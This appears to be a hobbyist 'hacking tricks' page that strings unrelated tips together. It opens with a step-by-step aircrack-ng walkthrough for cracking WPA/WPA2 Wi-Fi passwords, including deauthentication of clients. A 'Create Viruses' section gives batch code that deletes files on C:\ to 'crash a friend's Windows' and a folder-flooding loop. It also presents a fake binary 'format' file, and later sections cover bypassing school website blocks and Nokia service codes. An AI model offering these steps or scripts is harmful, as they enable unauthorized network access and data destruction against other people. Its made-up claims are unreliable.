wifi hacking

This lecture is about wpa\wpa2 cracking.
Requirements for WPA\wpa2 cracking:
1= Backtrack 5r3
2= WiFi device
3= world-list file

The commands which we will need in wpa\wpa2 cracking are as under:

1= Airmon-ng
2= Airmon-ng start wlan0
3= Airodump-ng mon0
4= Airodump-ng -c ( channel ) -w ( file name to rite captured packets ) --bssid (bssid of network) mon0
5= Aireplay-ng --deauth 1 -a (bssid) mon0
6= Aircrack-ng (file name) -w( drag worldlist file )

Process . . . .

1= Open terminal and type first command:
Airmon-ng :

2= Now type second command :
Airmon-ng start wlan0 :
This command enables monitor mode on the wireless interface. (As shown)

3= Now type third command:
Airodump-ng mon0 :
This command will scane all networks. (AS shown)

4= Now type foruth command:
Airodump-ng -c ( channel ) -w ( file name to save captured packets ) --bssid (bssid of network) mon0 :
This cammand will scane a single network and you must have to wate untill you get handshake file .For our example, it would look like:
airodump-ng –w capture-packages –bssid 00:22:75:E7:6E:0B –c 11 mon0 (As Shown)

5= Now type fifth command :
Aireplay-ng --deauth 64 -a (bssid) mon0 :
This command will send deauth request if the data is not generating you can also increse the number of deauth requests.for our example, it would look like:
aireplay-ng --deauth 1 –a 00:22:75:E7:6E:0B –c F0:CB:A1:2A:FB:62 mon0. (As shown)

6= Now type sixth command :
NOTE: World-list should be in "/ROOT/PEN TEST/PASSWORDS/WORLD-LIST/"
Aircrack-ng (file name) -w( drag world-list file ) :
This command will crack the password. (As Shown)

Computer tips

In this tutorial you will learn cool and simple trick to Create an undeletable and unrenamable Folders In Windows operating system. Most of the Peoples are not aware that it is possible to create Undeletable, Unrenamable folder in windows without any software. To Test this concept just follow simple steps given below.

Try to make a new folder in windows & give it name con,aux, lpt1, lpt2, lpt3 up to lpt9. you won't be allowed to create folder with above mentioned names, Because they are reserved words in windows.

How To Create Undeletable And Unrenamable Folders ?

  1. Go to Start and then Click on Run
  2. Type cmd & hit enter (To open Command Prompt ).
  3. Remember you cannot create Undeletable & unrenamable folder in your root directory (i.e. where the windows is installed) That means you can't make this kind of folder in C: drive if you installed windows on C:
  4. Type D: or E: and hit enter
  5. Type md con\ and hit enter (md - make directory)
  6. You may use other words such as aux, lpt1, lpt2, lpt3 up to lpt9 instead of con in above step.
  7. Open that directory, you will see the folder created of name con.
  8. Try to delete that folder or rename that folder windows will show the error message.

How to delete that folder ?

It is not possible to delete that folder manually but you can delete this folder by another way mentioned below.
  1. Open Command Prompt
  2. Type D: ( if u created this type of folder in D: drive) & hit enter
  3. Type rd con\ (rd - remove directory)
  4. Open that directory and the folder will not appear because it is removed.
- See more at: http://www.coolhackingtrick.com/2013/07/create-undeletable-and-unrenamable.html#sthash.qGoSaEhD.dpuf


How to Access Block Websites


Many schools and colleges do not allow their students to use some social networking sites and other sites like facebook, twitter and youtube. Here I have given some tricks on how to access blocked internet sites. Enjoy…
How to access blocked websites
Steps to access blocked websites:
Step 1: Use https:// instead of http://
 Ex:- Use https://www.facebook.com instead of http://www.facebook.com

Step 2: Use Internet Based Proxy Servers instead of Google Chrome and Mozilla Firebox

Step 3: Use IP address instead of Domain Names
             Ex:- Use address) instead of www.facebook.com
By using this three methods you can access blocked internet websites.

How to find Websites IP
   Go to Run
   Then Type ping ‘space’ website Name (Ex:- Ping www.facebook.com)
The Command Ping www.facebook.com Shows
Pinging www.l.google.com [] with 32 bytes of data:

Reply from bytes=32 time=294ms TTL=55
Reply from bytes=32 time=295ms TTL=55
Reply from bytes=32 time=272ms TTL=55
Reply from bytes=32 time=291ms TTL=55By

Using the above command you can find IP address for any website..!

Create Viruses

Create 5000 Folders

How We Create More Than 5,000 Empty Folders?
Open Notepad and Type: 

  off :top md %random% Goto top

And Save It Folder.Bat Enjoy!

Apni Dost Ki Windows Crush Karen

Iss Virus Se Apni Dost Ki Windows Crush Karen.
Open Notepad And Paste This Code On Your Notepad:

@Echo off
Del C:\ *.* y

Aur Iss ko Save As kar ke .Bat Mein Save kar Den.
For Example Crush.Bat Mein Ya Any One kisi Bhi Naam Se Save kar Den Phir Last Mein .Bat Aana Chahiye. Enjoy!

Formate Hard Disk With Notepad

Write the following code in notepad:
010010110001111100100101010101010100000111111 00000
Save as Boom.exe

Shutdown Your Computer using ur Mobile phone

Shutdown Your Computer using ur Mobile phone

Using this method, a user can shutdown, restart, hibernate, etc. his or her computer, just by sending an email from his or her phone. To do this, all you will need is Microsoft Outlook which should come with Microsoft Office, which most people have. This will need to be on the computer wish you wish to shutdown. So, this is how you do this:
1. First, you need the batch files to perform the Shutdown, Hibernate etc. You can write them down yourselves
2. open your note pad and write lik this... Quote: c:\windows \system32\shutdown -s -f -t 00 and save it as shutdown.bat
3. Open up Microsoft Outlook. Make sure that you have already configured it for your email.Now we will need to make it so that Outlook checks your inbox about every minute (1 minute for testing time can be increased if a delayed shutdown is desired). You can do this by going to Tools: Options.
4. Then click the Mail Setup tab, and afterwards, the Send/Receive button.
5. Make sure that the Schedule an automatic send/ receive every... box is checked, and set the number of minutes to 1. Now you may close all of these dialog boxes.
6. Now go to Tools: Rules and Alerts... Next click the options button in the upper right hand corner and press the Import Rules button.
7. Now select the shutdown.bat file ...whi u hv created ...
8. Now, when you send a message from your phone to your e-mail address with the subject shutdown or smsshutdown%%, your computer will shutdown. Tip: Use of any of the Isolated or dead E-mail address or any e-mail will shutdown your computer. I hope you like it.

Information For NOKIA CellPhone

Information For Nokia Mobile Phone:

information for Nokia Mobile Phone.

Nokia Mobile Phone secrets, codes and technical information.

1. Code *3370# -Activate Enhanced Full Rate Codec (EFR) - Your phone uses the best sound quality but talk time is reduced my approx 5%.
#3370# -Deactivate Enhanced Full Rate Codec (EFR).

2. *#4720# -Activate Half Rate Codec - Your phone uses a lower quality sound but you should gain approx 30% more Talk Time.
*#4720# -Deactivate Half Rate Codec.

3. *#0000# -Displays your phones software version, 1st Line : Software Version, 2nd Line : Software Release Date, 3rd Line : Compression Type.

4. *#9999# -Phones software version if *#0000# does not work.

5. *#06# -For checking the International Mobile Equipment Identity (IMEI Number)

6. #pw+1234567890+1# -Provider Lock Status. (use the "*" button to obtain the "p,w" and "+" symbols).

7. #pw+1234567890+2# -Network Lock Status. (use the "*" button to obtain the "p,w" and "+" symbols).

8. #pw+1234567890+3# -Country Lock Status. (use the "*" button to obtain the "p,w" and "+" symbols)

9. #pw+1234567890+4# -SIM Card Lock Status. (use the "*" button to obtain the "p,w" and "+" symbols).

10. *#147# -(vodafone) this lets you know who called you last.

11. *#1471# -Last call (Only vodofone).

12. *#21# -Allows you to check the number that "All Calls" are diverted to.

13. *#2640# -Displays security code in use

14. *#30# -Lets you see the private number.

15. *#43# -Allows you to check the "Call Waiting" status of your phone.

16. *#61# -Allows you to check the number that "On No Reply" calls are diverted to.

17. *#62# -Allows you to check the number that "Divert If Unreachable (no service)" calls are diverted to.

18. *#67# -Allows you to check the number that "On Busy Calls" are diverted to.

19. *#67705646# -Removes operator logo on 3310 & 3330

20. *#73# -Reset phone timers and game scores.

21. *#746025625# -Displays the SIM Clock status, if your phone supports this power saving feature "SIM Clock Stop Allowed", it means you will get the best standby time possible.

22. *#7760# -Manufactures code.

23. *#7780# -Restore factory settings.

24. *#8110# -Software version for the nokia 8110.

25. *#92702689# -Displays - 1.Serial Number, 2.Date Made, 3.Purchase Date, 4.Date of last repair (0000 for no repairs), 5.Transfer User Data. To exit this mode you need to switch your phone off then on again.

26. *#94870345123456789# -Deactivate the PWM-Mem.

27. **21*number# -Turn on "All Calls" diverting to the phone number entered.

28. **61*number# -Turn on "No Reply" diverting to the phone number entered.

29. **67*number# -Turn on "On Busy" diverting to the phone number entered.

30. 12345 This is the default security phone lock code.

31. press and hold # -Lets you switch between lines.

If you know any nokia codes which is not here kindly wright it in the comment box.

Nokia 3250 / N91 / N71 / E60 / E61 / N803230 / 6260 / 6600 / 6620 / 6630/38 / 6670 / 6680/81/82 / 7610 / N70 / N903650 / 3660 / 7650 / N-Gage / N-Gage QD.